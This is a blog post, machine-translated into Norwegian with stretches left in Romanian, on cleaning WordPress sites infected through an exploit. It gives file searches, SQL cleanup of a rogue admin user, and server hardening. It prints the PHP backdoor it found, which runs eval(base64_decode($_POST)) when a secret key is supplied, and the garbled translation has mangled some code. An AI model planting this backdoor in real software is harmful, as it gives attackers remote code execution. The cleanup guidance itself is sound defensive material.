WordPress utnyttelse – Rengjøring av virusfiler, SQL og serversikkerhet.
Før du leser dette innlegget, må du se innlegget her, for å forstå noe. :)
Jeg fant i flere filer av bloggene på stealthsettings.com koder som ligner på de nedenfor, som dukket opp som et resultat av å være infisert med utnytter WordPress.:
<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST['fil'])); gå; } ?>
og
<?php if($_COOKIE['44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['fil'])); gå; } ?>
I tilfellet ovenfor handler det om filen xmlrpc.php av Søvnig, men på en grep på serveren kan man se at det er ganske mange koder av denne typen i kildene.

Rensing av infiserte filer:
Ååååå...
1. Den beste løsningen, etter at den er ferdig Sikkerhetskopi- og renset databasen, er det sa Slett filene til WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE['44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['fil'])); gå; } ?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”
3. in /tmp , søk etter og slett mapper som tmpYwbzT2
SQL opprydding :
1. i tabellen tabellen wp_options se om den eksisterer og slett linjene: intern_lenker_cache, rss_f541b3abd05e7962fcab37737f40fad8 og wordpress_options.
2. Gå også til i wp_options aktive_plugins og slett, hvis det er en, en plugin som ender på en av utvidelsene *_new.php, *_old.php, *.jpgg, *.giff, *.pngg eller hvis det er en annen mistenkelig utvidelse, sjekk nøye.
3. I tabellen wp_users, se om det er en bruker som ikke har noe skrevet til høyre på spalten bruker_fintnavn. Slett denne brukeren, men husk nummeret i ID-kolonnen. Denne brukeren vil sannsynligvis bruke "WordPress" som bruker_pålogging og det ser ut til at det ble opprettet på datoen 00:00:00 0000-00-00.
4. Gå til bordet wp_usermeta og slett alle linjene som tilhører ID-en ovenfor.
Etter at du har gjort denne sql-rensingen, deaktiver og aktiver deretter en plugin. (i bloggen –> Dashboard –> Plugins)
Serversikkerhet:
1. Se hvilke kataloger og filer som er "skrivbar” (chmod 777) og prøv å sette en Chmod som ikke lenger vil tillate skriving på noe nivå. (chmod 644 for eksempel)
finne. -perm -2 –ls
2. Se hvilke filer som setter biten sør eller skrens . Hvis du ikke bruker disse filene, legg dem på chmod 0 eller avinstaller pakken som inneholder dem. De er veldig farlige, fordi de utfører med privilegiene "gruppe"eller"rot” og ikke med rettighetene til den vanlige brukeren som kjører den filen.
finn / -type f -perm -04000 -ls
finn / -type f -perm -02000 -ls
3. Sjekk hvilke porter som er åpne og prøv å lukke eller sikre de som ikke er i bruk.
netstat -an | grep -i listen
Det er omtrent det. Jeg ser det noen blogger er forbudt av Google Søk og andre sier "Godt gjort!!!" . Vel, jeg ville ha gjort det for dem ... men hva sier du hvis Google begynner å forby alle nettsteder hvem gjør JEG SPAMMER og pakker trojanere (Trojan.Clicker.HTML) i informasjonskapsler?
WordPress utnyttelse – Rengjøring av virusfiler, SQL og serversikkerhet.
Hva er nytt
Om Stealth
Lidenskapelig opptatt av teknologi, skriver jeg med glede på StealthSettings.com siden 2006. Jeg har rik erfaring innen operativsystemer: macOS, Windows og Linux, men også innen programmeringsspråk og plattformer for blogging (WordPress) og for nettbutikker (WooCommerce, Magento, PrestaShop).
Se alle innlegg av StealthDu kan også være interessert i...
En tenkte på “WordPress utnyttelse – Rengjøring av virusfiler, SQL og serversikkerhet.”